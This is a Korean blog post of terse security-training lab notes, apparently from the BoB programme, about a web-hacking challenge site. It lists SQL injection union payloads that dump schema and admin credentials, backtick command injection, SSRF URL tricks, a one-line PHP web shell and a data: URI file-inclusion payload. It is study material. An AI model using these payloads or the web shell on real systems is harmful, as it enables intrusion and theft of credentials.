본문 바로가기
비오비

8/1

by sonysame 2019. 8. 1.


https://bob.rubiya.kr/chall.php

order by 3


column은 3개


0 union select 1,2,3


0 union select 1,2,version()



information schema


0 union select 1,2, info from information_schema.processlist


table=> 0 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=database()


0 union select 1,2, group_concat(column_name) from information_schema.columns where table_name='user'


0 union select id, pw, 1 from user where id='admin'





system("host {input}")

`head -2 index.php`

`grep FLAG index.php`


gitdumper

git log -p 



ssrf=>pastebin


?http://a@pastebin.com:80@rubiya.kr/raw/~~~

http://asdf.kr#@rubiya.kr


ssrf bible

A new era of SSRF


data에 XXE 넣어주기



exif 변조 툴???


file inclusion3번

외부에서 파일 include가 가능하다


<?php

system($_GET['c']);

?>

http://a.rubiya.kr


/payload


?page=data:text/plain,<?php%20system(id)?>;



smarty


'비오비' 카테고리의 다른 글

8/4 [박세준 멘토님]  (0) 2019.08.04
8/3[이종호]  (0) 2019.08.03
8/1[신정훈멘토님]  (0) 2019.08.01
7/31 [이종호멘토님]  (0) 2019.07.31
7/30 [조상현 멘토님]  (0) 2019.07.30